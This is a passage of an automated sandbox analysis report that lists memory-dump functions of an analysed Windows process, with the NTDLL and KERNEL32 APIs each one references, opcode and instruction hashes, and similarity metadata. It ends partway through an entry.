                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 0760711b688020613cecfbb252e4521ceb8ae7d9cb6c7552274a8b9f9dd8deb1
                                                                                          • Instruction ID: 017f1c928a8b456bdf4f589ac3f3aad2ab6fc38ca4dfa43f710d2dae01666673
                                                                                          • Opcode Fuzzy Hash: 0760711b688020613cecfbb252e4521ceb8ae7d9cb6c7552274a8b9f9dd8deb1
                                                                                          • Instruction Fuzzy Hash: CA520774A0921CCFCB249F74D8986ADB7B6BF49305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10BE1, Relevance: 6.6, APIs: 4, Instructions: 596libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 4c738b0b7da4740ed4ccfa39b02f9c35435a1b637a35793c46a6014e16ed69a2
                                                                                          • Instruction ID: 06967cfb3b2e9fa3f0a559160d4707b72d861bce680286cacd6212364f172d37
                                                                                          • Opcode Fuzzy Hash: 4c738b0b7da4740ed4ccfa39b02f9c35435a1b637a35793c46a6014e16ed69a2
                                                                                          • Instruction Fuzzy Hash: 92520674A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10C26, Relevance: 6.6, APIs: 4, Instructions: 589libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: df00fede77a48d8e1ce14311bc87a8331b5eed2ef905d6e07b04d0b1a2067a53
                                                                                          • Instruction ID: 167def6b9fffc2b34c5d5b497e5ca33f7f01ee091b86c91bb49179f6b6be1a13
                                                                                          • Opcode Fuzzy Hash: df00fede77a48d8e1ce14311bc87a8331b5eed2ef905d6e07b04d0b1a2067a53
                                                                                          • Instruction Fuzzy Hash: 74520774A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10C6B, Relevance: 6.6, APIs: 4, Instructions: 582libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: a96ca2924cbef81d2c1f05b80d045d9f834bd8e5914959014f637609bdea302a
                                                                                          • Instruction ID: 07a07b9c0328dc03721803926f1e7855dcab91fec2c5bab87e5e1b2d04ca408c
                                                                                          • Opcode Fuzzy Hash: a96ca2924cbef81d2c1f05b80d045d9f834bd8e5914959014f637609bdea302a
                                                                                          • Instruction Fuzzy Hash: FF420774A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10CB0, Relevance: 6.6, APIs: 4, Instructions: 575libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: cfeadd4128ba12e09f36999080ad57204a4edc5f463e17f7a22e53cd26d89530
                                                                                          • Instruction ID: 1e5b52843ffa7ff62a81d81b90b39a5086e4d9990ff42e88172db070225f6294
                                                                                          • Opcode Fuzzy Hash: cfeadd4128ba12e09f36999080ad57204a4edc5f463e17f7a22e53cd26d89530
                                                                                          • Instruction Fuzzy Hash: BF420774A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10CF5, Relevance: 6.6, APIs: 4, Instructions: 568libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 363a18797bb53d718859ddc6bb72c80c9b3c2c0f6ba5841f4f61df727d3aeb8e
                                                                                          • Instruction ID: f51e3ccbe8c4485363fc29b2f8e83aaa9c94ba4a9000e4e74e21a6ddfb247cb2
                                                                                          • Opcode Fuzzy Hash: 363a18797bb53d718859ddc6bb72c80c9b3c2c0f6ba5841f4f61df727d3aeb8e
                                                                                          • Instruction Fuzzy Hash: 89421774A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10D3A, Relevance: 6.6, APIs: 4, Instructions: 561libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: dbb94db9d082868282120942a0edf31a1cbdd8a199a8423aa3817cb1c69d039e
                                                                                          • Instruction ID: ef5de69f6ab0e52d446bb98fa0dc623ab8978ac8c938f7a183800b47b8ae5294
                                                                                          • Opcode Fuzzy Hash: dbb94db9d082868282120942a0edf31a1cbdd8a199a8423aa3817cb1c69d039e
                                                                                          • Instruction Fuzzy Hash: FF421774A0921CCFCB249F74D8986ADB7B6BF89305F2094EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10D7F, Relevance: 6.6, APIs: 4, Instructions: 554libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 9d8db033ed4f6a68ce0d93e413c27a8eea221cba19973c53580a46c1389ec447
                                                                                          • Instruction ID: 9950bf7d9a68169143f3eb1c65ef3fad1c712ef25802bfcb970e36f79c9a8ed3
                                                                                          • Opcode Fuzzy Hash: 9d8db033ed4f6a68ce0d93e413c27a8eea221cba19973c53580a46c1389ec447
                                                                                          • Instruction Fuzzy Hash: 22421774A0921CCFCB249F74D8986ADB7B6BF89305F1084EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10DC4, Relevance: 6.5, APIs: 4, Instructions: 547libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: cf47e6b3f1eb49bf6784223ac1aac0549fa27f2b4d8ee5c35947c4dcfc2571d4
                                                                                          • Instruction ID: 99f3b66c29a82cb5d443feb97f090b3c52deb997099a5c46edce64e19bfb76f1
                                                                                          • Opcode Fuzzy Hash: cf47e6b3f1eb49bf6784223ac1aac0549fa27f2b4d8ee5c35947c4dcfc2571d4
                                                                                          • Instruction Fuzzy Hash: B3421774A0925CCFCB249F74D8986ADB7B6BF89305F1084EAD609A7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 02806B7F, Relevance: 6.1, APIs: 4, Instructions: 138threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C10
                                                                                          • GetCurrentThread.KERNEL32 ref: 02806C4D
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C8A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02806CE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: a9121e0994e286c0aa572e35cf8504a5b57292e85593a8c8b726adfdc61df755
                                                                                          • Instruction ID: fc319f23ff4388e25cd5bfc2a4a8f8ffc4972e23f0ca33a7fd9df7a3caebc84a
                                                                                          • Opcode Fuzzy Hash: a9121e0994e286c0aa572e35cf8504a5b57292e85593a8c8b726adfdc61df755
                                                                                          • Instruction Fuzzy Hash: CC51A9B49003488FEB10CFAAD9887DEBBF4EF49318F20846AD408A7390D7356845CF66
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 02806BB0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C10
                                                                                          • GetCurrentThread.KERNEL32 ref: 02806C4D
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C8A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02806CE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: 125aa7f4187aa296bfc5f1b324d658c01000f3fe6dd85b7edcb7bfa534e6bd5b
                                                                                          • Instruction ID: 5909bef3507f61ac3f8117aa1c59abbcc7c65b3e01a59e1cd4b7d8dbd023390c
                                                                                          • Opcode Fuzzy Hash: 125aa7f4187aa296bfc5f1b324d658c01000f3fe6dd85b7edcb7bfa534e6bd5b
                                                                                          • Instruction Fuzzy Hash: 515169B49002498FEB50CFAAD5887DEBBF4FF48318F208469E409A7390D7756844CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11220, Relevance: 4.9, APIs: 3, Instructions: 381COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: d014f6667c43893701aac46386a79860d920b95526a2d13826d9d8b588d07420
                                                                                          • Instruction ID: ef333db68d6e6f2cebef75b80eee8d282bfe13530bcd2dc74a099de00a3df70f
                                                                                          • Opcode Fuzzy Hash: d014f6667c43893701aac46386a79860d920b95526a2d13826d9d8b588d07420
                                                                                          • Instruction Fuzzy Hash: CA0207B4A0921CCFCB24DB34D8946ADB7B6BF88305F2090EAD609A7340DB359E85CF15
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11265, Relevance: 4.9, APIs: 3, Instructions: 372COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 8c015e41dd694e8125cafb9581eb59a6f9ad872866b586ca3a9bc5a08de1991e
                                                                                          • Instruction ID: 5adf023df52012eebbed28112f695a1fe500fd81da65fd1cc413661518196922
                                                                                          • Opcode Fuzzy Hash: 8c015e41dd694e8125cafb9581eb59a6f9ad872866b586ca3a9bc5a08de1991e
                                                                                          • Instruction Fuzzy Hash: 450207B4A0821CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E112A1, Relevance: 4.9, APIs: 3, Instructions: 367COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 1866b2ca08459f8a74ea2598dae89abf707c62fb4672321e13321981bfb45a86
                                                                                          • Instruction ID: e26a4c14fecb936f3fe9ef66c6947655ad57032818309cd058140de643a22959
                                                                                          • Opcode Fuzzy Hash: 1866b2ca08459f8a74ea2598dae89abf707c62fb4672321e13321981bfb45a86
                                                                                          • Instruction Fuzzy Hash: 5D0207B4A0821CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E112E6, Relevance: 4.9, APIs: 3, Instructions: 360COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: b39b5b571ce9b99e2c2ff3b1ac03f4e99b665acf523aa46ca5ca2c83c45a85bf
                                                                                          • Instruction ID: 3656ea460fd80d1f367a61d1fa4c1bf657a1bd94d5945871cdffc4790080d5dd
                                                                                          • Opcode Fuzzy Hash: b39b5b571ce9b99e2c2ff3b1ac03f4e99b665acf523aa46ca5ca2c83c45a85bf
                                                                                          • Instruction Fuzzy Hash: AA02F7B4A0821CCFCB24DB34D9946ADB7B6BF89305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E1132B, Relevance: 4.9, APIs: 3, Instructions: 353COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 41309eeb5db663d1312e3d802da7b2b2d307e534bbeb04268cdab647a5331f07
                                                                                          • Instruction ID: b67c1e45a399eb1e550546322107dc3e978f85059ad8284c985e51ff71a938f8
                                                                                          • Opcode Fuzzy Hash: 41309eeb5db663d1312e3d802da7b2b2d307e534bbeb04268cdab647a5331f07
                                                                                          • Instruction Fuzzy Hash: ABF1F7B4A0821CCFCB24DB34D9946ADB7B6BF89305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11370, Relevance: 4.8, APIs: 3, Instructions: 346COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ae749dd3458155a1e372bd41367d6031692e6f833404b8b020429b22094a6295
                                                                                          • Instruction ID: d5e6b18579e77bc1c1f34717f8303d0f335c6d417dc6031a02ede70583ca31ae
                                                                                          • Opcode Fuzzy Hash: ae749dd3458155a1e372bd41367d6031692e6f833404b8b020429b22094a6295
                                                                                          • Instruction Fuzzy Hash: 2FF107B4A0821CCFCB24DB34D8946ADB7B6BF88305F2091EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E113B5, Relevance: 4.8, APIs: 3, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 88e7348d92e251890eee56f57753ca3587d8ee08a3ba9e100acec398498653c6
                                                                                          • Instruction ID: f925ddedf7ef8efffff43e3b2d56834e3537965b235897c2f07d88cd869cf27e
                                                                                          • Opcode Fuzzy Hash: 88e7348d92e251890eee56f57753ca3587d8ee08a3ba9e100acec398498653c6
                                                                                          • Instruction Fuzzy Hash: 8EF107B4A0821CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E113FD, Relevance: 4.8, APIs: 3, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: c7b4067b270ad11367f38143e19ab1255aa58714d9bf3546984261962ddaee6a
                                                                                          • Instruction ID: fb598c9b7879e4f802bc4be2cd3c9f2761c3afff9e20c38d0ec1af10029ab4dd
                                                                                          • Opcode Fuzzy Hash: c7b4067b270ad11367f38143e19ab1255aa58714d9bf3546984261962ddaee6a
                                                                                          • Instruction Fuzzy Hash: 5FF107B4A0825CCFCB24DB34D8946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11445, Relevance: 4.8, APIs: 3, Instructions: 323COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: bb5b6d4840a3fe33ccc8341e3a74ba0dea6255fdff958292c89eae68732d3f26
                                                                                          • Instruction ID: d1b04bd03c7f9f33277204edfa4171960a0a2d2980039decb7b81995773e36cd
                                                                                          • Opcode Fuzzy Hash: bb5b6d4840a3fe33ccc8341e3a74ba0dea6255fdff958292c89eae68732d3f26
                                                                                          • Instruction Fuzzy Hash: C2E108B4A0825CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11481, Relevance: 4.8, APIs: 3, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: f7c9d0cf8dd6ab5d63ec0b1c1cf86bee77234c1109d48f6f57af622f79c0052e
                                                                                          • Instruction ID: 5bdeae3320369587084688734d90fa8f31bffcbde88607d3556de1cc45c8ea28
                                                                                          • Opcode Fuzzy Hash: f7c9d0cf8dd6ab5d63ec0b1c1cf86bee77234c1109d48f6f57af622f79c0052e
                                                                                          • Instruction Fuzzy Hash: 91E107B4A0825CCFCB24DB34C9946ADB7B6BF88305F2091EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E114C9, Relevance: 4.8, APIs: 3, Instructions: 311COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 12e46b61b2bd6c4996ce19c6d45f083f20fdefe2234fae6fe03edcbd320c1cbe
                                                                                          • Instruction ID: e8f785270d3e87306d7b579330d9cde03c9401e87a05a0e74f36365e24bf1bc6
                                                                                          • Opcode Fuzzy Hash: 12e46b61b2bd6c4996ce19c6d45f083f20fdefe2234fae6fe03edcbd320c1cbe
                                                                                          • Instruction Fuzzy Hash: 41E107B4A0821CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11511, Relevance: 4.8, APIs: 3, Instructions: 304COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: d249234149de7ba766f11cf9b810eecf8fa2ad0d8ff4a43d4c2800713d2b6b13
                                                                                          • Instruction ID: 0ac109f3aea1bd74d165be0cf15546010964304ffc71addcb64f4485053ee0ce
                                                                                          • Opcode Fuzzy Hash: d249234149de7ba766f11cf9b810eecf8fa2ad0d8ff4a43d4c2800713d2b6b13
                                                                                          • Instruction Fuzzy Hash: 53D107B4A0821CCFCB24DB34C9946ADB7B6BF88305F2090EAD609A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11559, Relevance: 3.3, APIs: 2, Instructions: 297COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 3f81d89139aa64fa34e8386d313f7378a51a5c56998b131a90fc1ceaeb5126ca
                                                                                          • Instruction ID: 00697ce8221ce3e4b5dde082ac3ce95b0663803c17960a96d5d3fc17d7fab2be
                                                                                          • Opcode Fuzzy Hash: 3f81d89139aa64fa34e8386d313f7378a51a5c56998b131a90fc1ceaeb5126ca
                                                                                          • Instruction Fuzzy Hash: EAD107B4A0921CCFCB249B34C9946ADB7B6BF88305F2090EAD609A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E115A1, Relevance: 3.3, APIs: 2, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ad12fe616cd714475655725791286a0fb54d8d8858c375821366a5edfe9a3339
                                                                                          • Instruction ID: 10178c6154bd6431a4fd0de47fdb28c0e2f4657173ff3384c6e010c057d4c0d8
                                                                                          • Opcode Fuzzy Hash: ad12fe616cd714475655725791286a0fb54d8d8858c375821366a5edfe9a3339
                                                                                          • Instruction Fuzzy Hash: 0DD1F7B4A0821CCFCB249B34C9946ADB7B6BF88305F2094EAD609A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E115E9, Relevance: 3.3, APIs: 2, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 962d8d2f7084778136ff7f25eb33d3b13dd85e69e4921cc740d695c23556a601
